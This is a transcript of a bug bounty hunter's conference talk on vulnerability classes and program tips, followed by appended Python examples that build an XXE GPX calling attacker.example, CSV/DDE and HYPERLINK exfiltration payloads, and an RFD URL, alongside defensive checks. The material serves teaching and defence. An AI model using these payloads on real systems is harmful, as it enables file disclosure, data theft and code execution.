
Welcome all to "My experience as a bounty hunter". The theme of this talk will be around Boba Fett, who, for those who know Star Wars, is according to Darth Vader the best bounty hunter in the galaxy. I think he never died; even in the movie he was swallowed by some wormhole and it spat him out again, and nobody knows what happened to the bounty hunter. So this will be about my experience in the last two years regarding these BBAPs, which is what I like to call them, because they are bug bounty appreciation programs. This is a term that Google invented, and it makes sense: it's appreciation, it's like something good that you are doing. So that's what I will talk about.

My name is David Sopas, okay, you already know that. I'm a security consultant for Checkmarx and security team leader for Char49. In the past 10 years of experience I disclosed more than 50 security advisories on Bugtraq, Secunia, whatever. I did some work especially on web application security because it's my main focus, it's my forte, if I may say it. I was the founder of WebSegura; I don't know, raise your hands if you already know WebSegura. Okay, too many people, thank you.

And the part that makes it more interesting is that I love to hack web applications. That's the main topic of my life. I also sometimes participate in comments in the media when they have any questions regarding information security. I will not talk about "cyber"; I'm against the word cyber, okay, so if anyone is sitting here waiting for me to say "cyber attacks" or "cyber war", I will not tell. I was acknowledged by a few companies: Microsoft, which is quite cool, I was acknowledged or listed like eight times on Microsoft, some of them with a reward. From some of these companies I earned t-shirts, swag or bags, lights, software. I don't have here any antivirus companies, but I have lots of licences that I got for discovering security issues regarding, I don't know, Kaspersky, Panda, AVG, whatever. The most interesting one, I may tell, was eBay; it was very interesting. Booking, which is a bounty program I'm very comfortable with, and GoDaddy; I'm also very familiar with that program. So these are some of them.

In this talk I will talk simply about bug bounties, what is it, okay, I think anyone here already knows that; my experience on BBAPs; the most common vulnerabilities that I found, particularly in two programs, HackerOne and Cobalt; where to start searching, both in private programs and public programs; bug bounty versus, or not, security companies; and in the end, if you have any questions, you can ask me anything or come to me and we talk a little.

So what's bug bounty? Quite simple, right? You find a bug, you receive money, that's it. Okay, what can we say about this? Just that, which is good, right, when you get some good money. Crowdsourced programs like HackerOne, Cobalt and Bugcrowd helped the communication between the two parties: the hunter, if I may call it, and the company itself, the client, right? So just to give you a small example, I gave the example of Uber, because Uber has a nice interaction with Portuguese guys, because Integrity did an excellent job finding a security issue there. I already found one issue there also, but Integrity, okay, they won lots of money, so I think it's okay. You find the security issue on Uber, you report it on HackerOne, which is the platform that hosts this program. Uber or a HackerOne mediator or curator will tell you okay, it's a duplicate, or it's a valid one, okay; if it's out of scope you lose reputation, something like that. So in the end, if everything goes well, which went well for Integrity, right, HackerOne pays, bling bling. So it's quite simple.

Experience in bug bounty appreciation programs. So I started in March 2015 on Cobalt, by luck, yeah. I found a security issue on a big IT company, one of the biggest in the world. I was a client and I decided, okay, let's try to contact them and try to manage the bug itself; it was a serious risk. And they told me that there was a program that they were working with that was mediating the security issues there, so it was Crowdcurity, which is now Cobalt. So I was invited to that program and started finding more issues, and when I got more reputation I was climbing the ladder and getting more invitations to other programs, and six months later, with some effort, I was number one in the Cobalt rank. This is the rank at the time; I think it changed a little bit, I think at the current time it is this: I'm on the top, but I think Rupan is now number two, and I already have, I think, some more points, I don't care. This is the Hall of Fame, which is some type of game, so you get encouraged to find more bugs, not only for the money but also for
the reputation, and also for the, okay, money and reputation, it's like that. So I started to see that it was important to join other programs because I was doing well on Cobalt, and we also have present here a person that is a manager of Cobalt, Jacob. And I decided to join HackerOne and Bugcrowd. I had a very bad experience at first: I was getting good invitations for private programs, and after a while one of the programs decided to reply to one of my reports telling me that it was an acceptable risk, and I was like, okay, this is e-commerce, I can get all your users' information, I hack your API, I can get everything that I want from it, and the guys: oh, but we cannot change it, sorry, it's an acceptable risk. I tried to mediate with Bugcrowd and they helped me a lot, but sometimes it doesn't... the communication with the program was a very bad experience for me, and so I stopped working with Bugcrowd. Also it's very much hardware security and mobile applications, so it's not my strong point, so that was the start of my losing connection with Bugcrowd. HackerOne was awesome. I had lots of invitations from private programs and it was pretty cool, because I think in the number of clients that must be the most popular one. I'm number... I'm in the top 30, yeah, on HackerOne, I think it's good for me; I think I'm the first Portuguese there with this rank. And okay, this is some of the other activity; all of them were for free, okay. I want to tell about OLX especially, because the OLX cross-site scripting only took two years to fix. Two years. I forgot about this bug and I was like, really? I found something on OLX, a really cool one; I tried for free again, just for the challenge, because it was olx.pt and I'm Portuguese, so let's try it. They offered me a t-shirt, I think, and whatever; no, it's important. Nowadays I don't buy t-shirts anymore; I may ask in the future for trousers or other types of clothes, because it's important, I don't want to give a talk with only a t-shirt, that's weird, but okay. Although I did achieve this: persistence, okay, I'm a very persistent guy, I don't quit easily. When I find something that I need to catch, it needs to be mine. So I always, since I was a kid, I was a self-taught guy and read a lot of books, and with that in mind I always try to accomplish my goals. And I'm not a full-time bug bounty hunter or something; like I said before, I'm a security researcher. I was also listening to the talk of Jonathan, which was very interesting, giving the other view, it's very cool. So one of the things I do is searching where others usually don't search; that's very important. And in the end, to prove to myself that I could do it: there's a challenge, I need a challenge in my life, and this is one of them.

Some rules. Because you are in a bug bounty program you have some specific rules: always respect the scope, they have rules, okay, you need to follow them; if they have only three domains, or one domain and subdomains, you need to test only them. Respect the program itself, don't be a beggar; again, I will talk about this at the end, because in the next slides I will show some examples of how not to be a beggar. Write clean and provide as much information as you can to the program. Again, even Uber has a reference on the Integrity blog regarding the discoveries that they found; that's very important. And I also have to make more examples. One, which is a friend of mine who is in the audience, found a duplicate on HackerOne and they paid him anyway because the report was so good; so that's very important, if you write a good report you might get lucky. And also on Uber, I only found one security issue on Uber, I don't spend too much time there; I found an out-of-scope issue. Okay, usually they don't pay for out of scope, but in the report, in the description, I wrote perfectly: I know this is out of scope, okay, but this is a security risk that I think is important to publish and to tell you guys about, and you must try to fix it. Okay, and Uber were so cool that they resolved the problem very fast and rewarded me with money. So it was out of scope, but still, if you have a good report and good interaction and you're respectful to the program, they pay you; that's one of the things. Another tip: read other bug bounty reports. For example, HackerOne has a full disclosure area where you can see lots of reports that are very good, some of them very bad, you'll see on the next slide, but also you can learn a lot from this. And the book Web Hacking 101 is a compilation of lots of security issues on bug bounty programs; it's well written, it's very cheap, I think it's $9.99 or something, so it's worth it.

Don't be a beggar. I think if I click it opens... This is a "more money please", and the guy sent him $1. Okay, you want more money? I'll give you $1. Incredible. This is a beggar. Again we have more examples, oh sorry, okay, and now I can see it. This guy was asking for updates, like daily: any update? Any update about this one? Any update about this report, sir? That's incredible; you need to be polite, right? The next slide, the next slide, no: "any reason why you didn't close this? How can you close without giving any reason? Don't you see a detailed report with image explanation?" He gave the image, please give the guy money. Okay, this is the one, and this guy is legendary, because it's the same guy, the same guy as the other one. So this guy sent to the Mail.ru program on HackerOne: I want $50, $500, yeah; but again he didn't quit: "hey, I want more", and you have, when you pay this
amount, I think this guy needs the money fast, okay, come on program, give him the money fast, maybe he has bills to pay: "can you provide more reward please, please, seriously, I need $500". So this is how to be a beggar, and don't be like that if you want to test some bug bounty program.

Most common vulnerabilities. I gathered some information about my valid reports, more than 500, and it's only based on Cobalt and HackerOne because they are the programs that I work with more often. So this is in Cobalt; sorry if my charts are not as cool as by Edge, but I did them online, I'm not very comfortable doing it, but I want to be specific that Reflected File Download was the most popular vulnerability that I found, very closely followed by cross-site scripting, on the Cobalt platform. It's incredible, because it's very different from the next chart, from HackerOne. This was based on 200, 220 valid reports, I don't know, but it was pretty close, because Reflected File Download is one of my favourite vulnerabilities; it's not very well known and I think most web applications have this vulnerability. So this is from Cobalt; HackerOne is completely different: cross-site scripting, of course, because it's the first thing that you try when you have, for example, a private program on HackerOne; the first thing you try is cross-site scripting. I can divide this 50% into reflected and stored; the only reason is that reflected sometimes pays like 1K at max and stored can sometimes get us 5K, so it's important to know that type of information. I found some IDORs, injection, template injection, which nowadays is very common; I love JSON issues, APIs and stuff like that; bad practices are becoming more frequent, well, they pay. So, oh, I'm going backwards, no, sorry about that, I clicked the wrong button, come on, okay.

Where to start searching and getting, in this case, coins. On private programs, of course cross-site scripting, because, why, they are the most common; you go to the most common vulnerabilities that you find, so cross-site scripting. XXE is one of the most interesting things right now, and it's one of the things that I try right next to the cross-site scripting; I always try to do both of them at the same time. Sometimes RCE, remote code execution, also very important; you can still find lots of ImageMagick vulnerabilities there, so it's important. Check vulnerabilities in subdomains, that's important also; I will give you some tools to check the subdomains. And bad practices. I will talk about XXE; cross-site scripting, it's a waste of time talking about it here because most of you guys already know that, and RCE also.

So, private programs, XXE. Well, if you get a request that parses XML and that allows DTDs, I'm going faster because I assume that most people understand what I'm talking about, so XML configured to process the info, and I will show you a real example that I found on Wikiloc. I don't know if any of you knows Wikiloc; well, it's a place where you can upload or download GPS GPX files and go for a walk or cycling or something like that. So I downloaded the GPX file from Wikiloc and I modified it, the GPX, which is XML, so it has coordinates; I just tweaked it a little with the entity to get the /etc/issue file on the Linux server, and requested the system to go to my website, davidsopas.com, and grab the DTD from my server, then you get the request by the same name; this is simplified. So the important thing is that when I sent this GPX file I got interesting information on my server, especially in my web server log: it returned the version, the file contents. This is my web server, okay, the IP is not this one anymore, so it returned in the request "Debian", okay, it's the content of the /etc/issue file, and it also tells me the user agent: they are using Java. So when I uploaded my modified GPX file I got interesting stuff; with this we can drop a shell, control everything on the server, we can do whatever. And they were pretty nice, they offered me a t-shirt, they always offer t-shirts, and a voucher to, I don't know if I can say it, Chain Reaction, so I can buy some cycling stuff, which I love, because one of the things that I do is cycling. So very, very cool.

Subdomains. I have some open source tools here that I use: Sublist3r, subbrute and theHarvester. Some of you may know them, some of you may not; they are pretty easy to use, they are all terminal. So you can run sublist3r and put the domain, and they gather all the subdomains using reverse IP, they use Google dorking and stuff like that; they are very, very interesting. theHarvester is a tool that even harvests user accounts, emails that it finds with Google dorking, LinkedIn accounts for the guys that work at that company; so it's an awesome tool also, it's very interesting.

Again, on private programs, after you check vulnerabilities on subdomains, let's check for WordPress installations, because especially on Uber that's a lot of money. You can use WPScan, I think it's the best WordPress scanner tool that is available to the public nowadays. So run WPScan and try to find something interesting: plugins, or anything like that. Check for files and directories: DirBuster and dirsearch are very, very good. One of the things that I already found: sometimes developers like to leave some files on the server root, accessible to the public, that are interesting. For example, I already found a database, like an SQL backup, okay, the whole database was in a backup file. phpinfo is very common to find, so you get the information from PHP, and path disclosures and stuff like that. Also I found some information regarding banking accounts in a file, I don't know what it was called, one dot old dot db or something; I found it and I saw transactions there and I was like, okay, let's send it to the program to see if it pays, and yeah, it pays. And finally, go Burp, it's my favourite tool, my proxy tool, Burp. You can do everything, even check for files using Burp, you can do WordPress scanning with Burp. Bad practices: you can earn
some, not a lot of money, but some of it. Token validation; sensitive information inside cookies, yeah, sometimes cookies are encoded in base64 and have useful information, I don't know why. Password strength, yeah, this is one thing that I found lots of times on web applications, and most of them in big companies, that allow you to use the password "1"; if anyone allows a brute-force attack, please, okay. "1" isn't even the most common, I think it's "1234", so it's allowed to be used; companies need to fix that, and it's also one of the things that are eligible for a bounty reward. Username enumeration, also using reset password or something like that, and server information disclosure, usually in headers. And again I'm going backwards.

Public programs, okay, this is the hard part, because in public programs there are hundreds or even millions of guys trying to hack the web application where you try to also get some. So what I try: Reflected File Download, because it's one of my babies, I love this; and also business logic flaws, very interesting, this is not very common, I'm still studying it, and it might be one of the future bounty rewards that gain lots of money, business logic flaws, and I will talk about it later. Mobile security issues: of course nobody, especially me, I don't really understand the mobile security issues, so what I usually do is just try to find the endpoints in the application and try to get an API and gather from that, because I have no knowledge of mobile applications. CSV injection, Excel injection, also very cool, and I will show an example of how to do it. Cross-site scripting bypasses, because I love cross-site scripting and it's so interesting sometimes to bypass security with this vulnerability: "no, no, we have everything sanitized"; okay, let me prove you wrong, or not; that's incredible also. Paid member areas: most bounty hunters don't pay for a member area, so your scope is even bigger, because, okay, the member area of a client or something like that is in scope and you pay 50 bucks; most bounty hunters, especially from countries where, okay, I won't say it, but they don't pay that kind of money, so if you pay 50 bucks you might find lots of vulnerabilities that get you a lot more. So it's very interesting.

And so, I don't know, I already talked with the guy who discovered this; he published it at Black Hat, Oren Hafif, he's from Israel, he found Reflected File Download, and he told me that this is incredible and that every modern web application is vulnerable to this type of vulnerability. Again, it's present in every application, it has lots of potential; keep in mind you find these usually on APIs, but it's not a JSON issue, so you only need some type of reflection to do it. And I wrote a very good article, but the address was so big, so I tried to shorten it a little bit, so it's "RFD rocks". So it's quite simple, but in the end I will also tweet my presentation if you want to download it. This is a video example of a Reflected File Download that I found on Google, which got me some bucks, and I think I need to play it. Okay, so you have google.com, I try the callback, I injected my callback with calc, of course, calculator, I'm a trustworthy guy, okay, setup.bat from Google, okay, I trust it, I save it, and when I run it, something from Google, you'll get... what? A calculator. Nice. I can do whatever I wanted: I could open a new tab with Chrome, disabling all the security add-ons and stuff like that, I can hijack the account of the administrator, whatever. I have this one from eBay: I created a specially crafted page, it was posted on WebSegura, it's still on WebSegura; on eBay I was only listed on the acknowledgement list, and it took like a year to fix this issue. And what I did is auto-download stuff, setup.bat, a batch file, so when I open the file it opens a new window; you can see it's from eBay, the download, so pretty trustworthy in my opinion. So when I run it, it opens a new window; this could be malicious, but it's not, okay, you can do whatever you want with this.

Business logic flaws, it's something that I told you before, it's something that I'm still learning a lot about, because it's not very common. Any operation that the web application is, or is not, coded to perform, or was not supposed to do, can be used as an attack. For example, my web application uses two-factor authentication, right, okay, I think I'm secure; but if the developer forgot the same authentication on the reset password, where I only have to click the link and it gives me access to the account, I bypass the two-factor authentication. So this is a major issue and you can get like two to 5K with this issue; this is a business logic flaw, it's quite simple. I'm still learning about it, and you have lots of them; it's very time consuming to learn this and you need to get into the guts of the application to hack it. And I found a great paper called "Breaking the Web with Logics"; it's very interesting, so you can search for it, it's very cool. Mobile security issues: again, not very familiar with mobile security issues, and why in public programs? It's interesting because not many people know how to hack applications on Android or iOS or something like that, so it's very important on public programs to try that; this is one of the things that you can try on public programs.

CSV injection, I love this, it's so simple. So imagine that the web application has export or import of CSV or Excel; okay, XML no, Excel yes. For example, a program on Cobalt, which I will not name, had a "download member list" that was accessible by members and admins. So I changed my name to =2+5, quite simple, it's like doing template injection just using brackets, but okay; and when I opened the CSV after the export, I noticed that my cell was the number 10, okay, it did the math, so interesting, not bad. So what I did: I used DDE, which is a command on, I think it's Office, I think, that tries to open cmd and run calc. Okay, if someone
opens this Excel file it will pop up a calc; maybe, yeah, it opens a calc. So this is the command, you can see it; you can change your name to a CSV injection and when the admin or other members open it, they pop up a calc. It's very interesting, and it works on Office, on Excel, and on OpenOffice, it doesn't matter, you only have to change the type of command. You can use another thing which is very interesting: for example, imagine that your password is next to my last name, Sopas; you can use =HYPERLINK, use your link, for example looper.com, and you put a question mark and give the parameter that is in C3; when they click it they send their password, okay, because it's on my server and I'm waiting for that request. So it's very simple to recreate and it's very, very common; nobody... because sometimes they say okay, I sanitize the equals sign; you can use the plus sign, the minus sign, many people don't know that you have lots of parameters that you can use.

Cross-site scripting bypasses. I'm a big fan, okay, of cross-site scripting, and usually on public programs when you send something that you found, because many companies take so long to fix it, it gets duplicate, or it's already fixed, or something like that; fixed? No, because I already sent it. But it's kind of a cliché: you need to think outside the box. What I did: okay, let's go to the Mozilla documentation and try to find something interesting, like ES6, the new JavaScript, cool, we can do anything with other types of characters, like: most WAFs and sanitizers block single and double quotes, okay, in ES6 I use the backtick, I bypassed it. So quite simple, using documentation on the new JavaScript, or new technologies like Angular or React, you can learn a lot. It's incredible because you can even use, I tweeted this in October, a cross-site scripting payload even in the function name; that's incredible, you have the information here, so my function is called this, so it's quite simple. Also cross-site scripting bypasses again: many developers try to use the content type HTML on JSON requests, which is very wrong, because if it reflects something that you injected, like a name or a callback, you get a popup, right, it's very simple. They need to create the response with application/json or text, or even protect themselves, because this can even be used as a Reflected File Download: they need to use Content-Disposition to force the name of the download, they need to sanitize, and write the content type as something other than one that gets rendered as HTML.

Paid member areas, like I told you: most of them don't pay for it, and I already paid for many member areas, which is good because my scope is better than most people's, okay, so you can increase your scope using this. And really, if you want to start searching on bug bounty programs, start here, and business logic flaws, because I think that's the way to go, not the other ones.

Finally, I don't know how much time I have, 15 minutes, okay. This is something some colleagues of mine and I have discussed a lot, because especially I'm not a bug bounty hunter, I have another profession, but I do this like a hobby; I don't get more money, and with the money I earn I could buy stuff that usually I couldn't, so more shirts, yeah, but I need other things besides shirts, my wife isn't happy with a little pile of t-shirts too, okay. So one thing that I try to explain to security companies is that bug bounties and security companies can combine with each other, okay, because they are totally different: the diversity of bounty hunters has a completely different approach from the penetration testing guys. So one of the things that I try to explain to most of the colleagues that work for security companies is that it's not a perfect solution, of course, combining bug bounty and security company. I'm telling you this because one of the last penetration tests that I did was on a program that was present on HackerOne like, a year ago, no, sorry, it was present during a year, yeah, and it had 70 reports solved and paid, so it's very hard to find something there because it was public, many researchers tried to hack it; and I can say that my penetration team could gather 15, I think, security issues, some of them pretty critical. So it's something that you can combine with each other, it's a completely different market, and I think companies always need to have a security company, external, internal, it doesn't matter, they need to be specialized with those people; and also if they have the money, because the perfect solution involves money, you need to have money to run this: do a bug bounty program, establish a bug bounty program, even moderated by the security company, and help each other in some way, okay. So that's my point of view; this topic is still in limbo and it's just my point of view. So if you have any questions, feel free
to do it. Or the same guy that you have in your presentation? No, yeah, I was re-listening to yours and I was like, damn, I'm next and I already used Yoda. So, everyone, does anyone have any question? Yeah.

Do you get pushback, sorry, do you get pushback from organizations on RFD a lot?

Sometimes, yeah, because sometimes you need to explain a little better what Reflected File Download is. For example Google, they have in their non-payment rules or out-of-scope rules that Reflected File Download is not rewardable, okay, but I was paid by Google for that, and I have friends that were paid for RFDs as well, yeah; it depends on business impact, attack scenarios, and you need to explain a little better what Reflected File Download is, you know.

Yeah, I think the context problem is trying to get people to start understanding, like, okay, well, why would this be an issue?

Yeah, yeah, that's the reason for a good report, and I try to... sometimes I even gave them links so they can understand; if I need to create a video, I create a video. So in a small company Reflected File Download sometimes doesn't make any sense, but in a big company like Google, yeah, they pay.

Yeah, I think it's a good example of obscure vuln types that people have a hard time understanding; it makes a really good candidate for bounties.

Yeah, yeah. In MO Reflected File Download is in scope; let's talk about it afterwards. Ah, okay. So, any more questions? You can still talk to me at the end, whatever you wish, if you have any question.

When you talked about the Google bug you discovered, did you talk directly to the Google security team or did you use HackerOne?

No, no, Google security team, yeah; I don't think on HackerOne they have any connection with Google, okay, in my opinion. Anyone? No? Hello.

Do you participate more in private or public programs?

Private, of course; they get you more money and there are many fewer researchers there, so it's more interesting, if you know what I mean; you don't have to, like, race condition against other guys. So it's very interesting, private programs, but for private programs you need to have reputation and you need to climb a ladder where you get more invitations, and more invitations, and stuff like that.

And could you live only with bounties? Sorry, could you just live with hunting bounties, or does it depend?

Me? In my opinion, no, because you can earn a lot of money in a month but next month you can earn nothing, zero, so it's very unstable, you know, and in my opinion, no. But I know, especially on HackerOne, there are lots of guys, the top 10 especially, two or three are living la vida loca, like I said, because... I can tell a story: a guy, I will not say the name because he's on camera, just bought, he's in the top three of HackerOne, he bought a Lexus, and he's in the United States, I don't know why, I just saw a Lexus stand in Lisbon; so he bought a Lexus and he paid more for transportation for the Lexus to come to his city than buying the car itself in another place next door. And especially when they go to DEF CON, they get a suite with crystal dancers; some guys are like that, so I know some guys that don't like that, not me. I think we have another question, yeah.

The vulnerability that you found, has it been solved by now, the vulnerability that they said had an acceptable risk?

Yeah, it was fixed.

Did you get anything for it?

No, nothing, yeah, and it was one of the biggest online newspapers in the US, I can say that.

Interesting, yeah. Another question? Okay, thank you.

How long do you spend on each project on average, and how fast, on average, how long does it take to get the first bug in a project?

Well, on average, usually if it's a private program I think you can find a bug in like the first hour, for example; on average on a public program not so much, sometimes you can spend one day, two days, if you find something, okay.

And when do you know it's time to move on to another one?

That's a hard question. Well, I don't quit easily, so if I don't find anything in those two days I try a different approach, try some type of... I try to study a little more about the infrastructure, the web application itself, and okay, I tried cross-site scripting, I tried SQL injection, I tried everything, okay, what should I do? Okay, let's try, like I told you, business logic, let's try something different. So for me to quit is very hard; I love good challenges, and your question, I don't know how to answer it, it's very hard, okay.

Last question. Within the private programs, how do you choose which one you want to attack, or do you go for them all?

That's very simple: money, okay. Okay, thank you. Simple. Everyone else?

Okay, so what was the bug that you found, if you can disclose it, that gave you more kick, or that you liked more to research, or was more challenging for you, like a remote code execution on something?

No, that wasn't... the ones that I found are not very challenging.

Like the most epic one you found?

Yeah, I'm trying to think; there are so many, that's bad, yeah, yeah. Maybe a subdomain takeover, which Jonathan talked about, yeah, it was very cool, because... I will not tell the company that had the vulnerability, but I can tell that the company had the subdomain pointed to a Salesforce account. So what I did: okay, it doesn't open anything, let's create an account on Salesforce and say my account is for that client, and I hacked the subdomain, very simple, and it pays a lot, yeah.

How much did they pay for it?

It depends, yeah, on the impact, but they paid like thousands of dollars, yeah; it's a very interesting vulnerability. I'm already asking questions, sorry.

Can you disclose your highest payout?

No, sorry. You did the question, sorry, I did, no, no, no, sorry. Well, but you do have a lot of t-shirts. Yeah, I could sell them someday, I don't know. Okay, thank you, yeah, so I hope you enjoyed this little talk, thank you, thank you.
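Added example, not from the talk and not Wikiloc's code: the GPX upload XXE the talk describes, recreated as a constructed malicious GPX next to a benign one, with a track-point reader that refuses any DOCTYPE, entity declaration or external entity before anything is expanded. The coordinates, the attacker.example host and the file names are assumptions made for this example.

```python
"""Added example (not from the talk): a GPX track-point reader that rejects
DTD and entity constructs, so an upload carrying an XXE payload is refused
before any entity is resolved.  Both documents below are constructed samples;
attacker.example is a placeholder host."""
import xml.parsers.expat


class UnsafeGpx(Exception):
    """Raised when an uploaded GPX tries to declare a DTD or an entity."""


# A normal GPX export: one track with two points (constructed sample).
BENIGN_GPX = """<?xml version="1.0" encoding="UTF-8"?>
<gpx version="1.1" creator="example">
  <trk><name>Morning ride</name><trkseg>
    <trkpt lat="38.7223" lon="-9.1393"><ele>12</ele></trkpt>
    <trkpt lat="38.7230" lon="-9.1400"><ele>14</ele></trkpt>
  </trkseg></trk>
</gpx>"""

# The same file "tweaked" the way the talk describes: a parameter entity that
# makes the server fetch a DTD from the attacker's host (out-of-band XXE),
# plus a general entity that would reflect /etc/issue into the track name.
MALICIOUS_GPX = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE gpx [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  <!ENTITY issue SYSTEM "file:///etc/issue">
  %remote;
]>
<gpx version="1.1" creator="example">
  <trk><name>&issue;</name><trkseg>
    <trkpt lat="38.7223" lon="-9.1393"/>
  </trkseg></trk>
</gpx>"""


def parse_trackpoints(gpx):
    """Return [(lat, lon), ...] from a GPX document, or raise UnsafeGpx.

    expat is driven directly so the DTD hooks fire before any content is
    processed: a DOCTYPE, an entity declaration or an external entity
    reference each abort parsing.  Nothing is fetched from the network or
    the filesystem.
    """
    parser = xml.parsers.expat.ParserCreate()
    points = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeGpx("DOCTYPE not allowed in uploaded GPX")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeGpx("entity declaration %r not allowed" % name)

    def reject_external(context, base, sysid, pubid):
        raise UnsafeGpx("external entity %r not allowed" % sysid)

    def start_element(tag, attrs):
        if tag == "trkpt" and "lat" in attrs and "lon" in attrs:
            points.append((float(attrs["lat"]), float(attrs["lon"])))

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start_element
    if isinstance(gpx, str):
        gpx = gpx.encode("utf-8")
    parser.Parse(gpx, True)  # handler exceptions propagate out of Parse
    return points


def is_safe(gpx):
    """True when the upload parses without any DTD or entity construct."""
    try:
        parse_trackpoints(gpx)
        return True
    except UnsafeGpx:
        return False


if __name__ == "__main__":
    print(parse_trackpoints(BENIGN_GPX))
    print("malicious GPX accepted?", is_safe(MALICIOUS_GPX))
```

The same hooks are what a hunter looks for from the other side: if the server's parser keeps the DOCTYPE and a request shows up in your web server log with a Java user agent, the check above is exactly what was missing.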
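Added example, not from the talk: the CSV injection payloads the talk describes (a formula probe, a DDE command that spawns calc, and the =HYPERLINK trick that exfiltrates a neighbouring cell) as constructed strings, the export-side check that neutralises them, and a scanner that finds such cells in an existing export. The member names, addresses and attacker.example host are constructed for this example.

```python
"""Added example (not from the talk): CSV/formula injection payloads as
constructed strings, an export routine that neutralises them, and a scanner
for exports that were written without that protection.  Sample data and the
attacker.example host are constructed."""
import csv
import io

# A cell starting with one of these is evaluated as a formula by Excel and
# LibreOffice.  Tab and carriage return are included because a cell that
# starts with them and then a formula is still interpreted by some versions.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# What the talk did: the display name becomes the payload.
PROBE = "=2*5"                                   # arithmetic probe -> 10
DDE_CALC = "=cmd|' /C calc'!A0"                  # DDE: runs calc when allowed
PLUS_VARIANT = "+cmd|' /C calc'!A0"              # works when only "=" is filtered
EXFIL = '=HYPERLINK("http://attacker.example/?p="&C3, "click to verify")'


def is_formula_injection(cell):
    """True when a spreadsheet would treat this cell as a formula."""
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)


def neutralize(cell):
    """Make a cell inert for spreadsheet import.

    A leading single quote tells Excel/LibreOffice to keep the content as
    text.  Legitimate values such as negative numbers are affected too, so
    numeric columns should be exported as numbers rather than through here.
    """
    if not is_formula_injection(cell):
        return cell
    return "'" + cell


def export_members(rows):
    """Write [(name, email, note), ...] as CSV with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "note"])
    for row in rows:
        writer.writerow([neutralize(c) for c in row])
    return buf.getvalue()


def find_injected_cells(csv_text):
    """Scan an existing export; return [(row, col, cell)] that would execute."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_injection(cell):
                hits.append((r, c, cell))
    return hits


# Constructed member list: one honest user and one whose name is the payload.
MEMBERS = [
    ("Alice Example", "alice@example.org", "ok"),
    (DDE_CALC, "mallory@example.org", ""),
]

# Constructed export written by an application that does no neutralisation.
RAW_EXPORT = 'name,email\n"' + DDE_CALC + '",mallory@example.org\n'

if __name__ == "__main__":
    print(find_injected_cells(RAW_EXPORT))
    print(export_members(MEMBERS))
```

The quote-prefix rule is the one that matters for the talk's point about "+" and "-": the check keys on the first character, whatever it is, instead of stripping one specific sign.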
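Added example, not from the talk and not Google's or eBay's code: a JSONP-style endpoint of the kind the talk says Reflected File Download turns up on, written first the vulnerable way (callback reflected unvalidated, served as HTML, no download name) and then with the fixes the talk lists (validate the callback, serve application/json, pin the filename with Content-Disposition, add nosniff), plus a triage check for a captured response. The URL, parameter names and payload are constructed.

```python
"""Added example (not from the talk): the vulnerable and hardened forms of a
JSONP endpoint with respect to Reflected File Download, and a triage check.
The endpoint, parameter names and payload are constructed for this example."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Only a plain (optionally dotted) JavaScript identifier may be reflected.
CALLBACK_RE = re.compile(
    r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")

# Constructed RFD attempt, as in the talk's demos: the last path segment is
# what the browser offers as the download name (setup.bat), and the reflected
# "callback" becomes the first line of that file.  "||calc||" makes cmd.exe
# run calc after the JSON text fails as a command.
RFD_URL = "https://api.example/v1/search;/setup.bat?callback=||calc||&q=x"
SAMPLE = {"results": ["a", "b"]}


def _callback(url):
    return parse_qs(urlsplit(url).query).get("callback", ["callback"])[0]


def vulnerable_jsonp(url, data=SAMPLE):
    """Reflects the callback unvalidated, as text/html, with no download name:
    usable for RFD, and for XSS since the response renders."""
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, "%s(%s);" % (_callback(url), json.dumps(data))


def hardened_jsonp(url, data=SAMPLE):
    """The fixes the talk asks for: validate, don't render, pin the filename."""
    cb = _callback(url)
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # Browsers take the download name from here rather than from the URL,
        # so the setup.bat path trick yields a harmless api.json instead.
        "Content-Disposition": 'attachment; filename="api.json"',
    }
    if not CALLBACK_RE.match(cb):
        return headers, json.dumps({"error": "invalid callback"})
    return headers, "/**/%s(%s);" % (cb, json.dumps(data))


def rfd_risk(url, headers, body):
    """Triage a captured response: True when non-identifier input leads the
    body and no Content-Disposition pins the filename."""
    cb = _callback(url)
    reflected_raw = body.startswith(cb) and not CALLBACK_RE.match(cb)
    pinned = headers.get("Content-Disposition", "").startswith(
        "attachment; filename=")
    return bool(reflected_raw and not pinned)


if __name__ == "__main__":
    for impl in (vulnerable_jsonp, hardened_jsonp):
        h, b = impl(RFD_URL)
        print(impl.__name__, "rfd_risk:", rfd_risk(RFD_URL, h, b), "body:", b)
```

The validation step is the one that does most of the work: once the callback can only be an identifier, the body can no longer start with a shell command, and the Content-Disposition header removes the attacker's control over the filename even if some other reflection slips through.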